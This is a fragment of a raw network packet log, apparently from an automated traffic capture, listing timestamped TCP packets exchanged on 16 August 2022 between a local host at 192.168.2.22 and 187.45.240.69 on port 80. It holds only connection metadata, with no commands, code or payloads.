                                        Aug 16, 2022 10:49:05.070700884 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070712090 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070744038 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070784092 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070795059 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070823908 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070837975 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070867062 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070883036 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070914984 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070955038 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070965052 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070996046 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071008921 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071034908 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071049929 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071077108 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071118116 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071130991 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071158886 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071166039 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071199894 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071238995 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071250916 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071280003 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071285009 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071322918 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071336031 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071372986 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071397066 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071436882 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071476936 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071489096 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071516991 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071523905 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071557999 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071599960 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071604967 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071639061 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071650982 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071680069 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071718931 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071734905 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071757078 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071799040 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071805000 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071839094 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071878910 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071892023 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.071922064 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071959972 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.071974993 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072000027 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072002888 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072041035 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072079897 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072093010 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072120905 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072123051 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072161913 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072205067 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072211981 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072247982 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072253942 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072287083 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072302103 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072331905 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072382927 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072436094 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072477102 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072515011 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072535992 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072551012 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072612047 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072654009 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072694063 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072705030 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072732925 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072743893 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072772980 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072813988 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072820902 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072853088 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072870016 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072899103 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.072946072 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.072985888 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.073023081 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.073045969 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.073070049 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.073088884 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.073142052 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.073183060 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.073515892 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.127378941 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.127449036 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.127466917 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.127502918 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.130343914 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254300117 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254334927 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254354000 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254373074 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254390955 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254400015 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254406929 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254425049 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254425049 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254439116 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254443884 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254461050 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254462957 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254478931 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254487991 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254513979 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254538059 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254554987 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254571915 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254590034 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254605055 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254609108 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254616976 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254626989 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254631996 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254646063 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254650116 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254664898 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254667044 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254683018 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254683971 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254688025 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254707098 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254712105 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254729033 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254759073 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254764080 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254782915 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254782915 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254798889 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254808903 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254817009 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254829884 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254833937 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254848957 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254851103 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254868984 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254873037 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254877090 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254885912 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254899979 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254904032 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254918098 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254921913 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254935980 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254939079 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254954100 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254956961 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254971027 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254976034 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.254990101 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.254992962 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255007029 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255011082 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255011082 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255038023 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255053043 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255151987 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255254030 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255295992 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255296946 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255326986 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255330086 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255388975 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255404949 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255422115 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255428076 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255439997 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255443096 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255456924 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255459070 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255464077 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255474091 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255484104 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255494118 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255506992 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255536079 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255537033 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255567074 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255584955 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255605936 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255630970 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255633116 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255656004 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255673885 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255690098 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255707026 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255713940 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255726099 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255733967 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255743980 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255749941 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255760908 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255765915 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255778074 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255780935 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255795002 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255799055 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255812883 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255816936 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255830050 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255834103 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255853891 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255871058 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255876064 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255893946 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255896091 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255912066 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255917072 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255929947 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255929947 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255947113 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.255947113 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255960941 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255976915 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.255990982 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256007910 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256023884 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256047964 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256052971 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256067991 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256072998 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256091118 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256185055 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256326914 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256342888 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256372929 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256375074 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256391048 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256434917 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256494045 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256536961 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256555080 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256571054 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256582975 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256587982 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256618977 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256622076 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256637096 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256642103 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256654024 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256654978 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256671906 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256679058 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256695986 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256711006 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256714106 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256731987 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256747961 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256750107 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256762981 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256764889 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256778002 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256782055 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256798029 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256812096 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256817102 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256841898 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256853104 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256860018 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256877899 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256892920 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256895065 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256917000 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256927013 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256933928 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256944895 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256953001 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256963968 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256972075 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.256980896 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256997108 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.256999016 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257014036 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257016897 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257030964 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257044077 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257061958 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257081985 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257100105 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257114887 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257116079 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257132053 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257134914 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257148027 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257150888 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257169008 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257174969 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257185936 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257205009 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257395029 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257412910 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257428885 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257446051 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257462025 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257477045 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257539034 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257576942 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257576942 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257596970 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257611990 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257613897 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257630110 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257644892 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257657051 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257671118 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257697105 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257730007 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257750988 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257770061 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257791996 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257806063 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257813931 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257832050 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257848024 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257849932 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257865906 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257867098 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257879972 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257884026 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257900000 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257926941 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.257946968 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.257961988 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.299916029 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.299968004 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.299983978 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300000906 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300015926 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300030947 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.300045967 CEST8049203187.45.240.69192.168.2.22
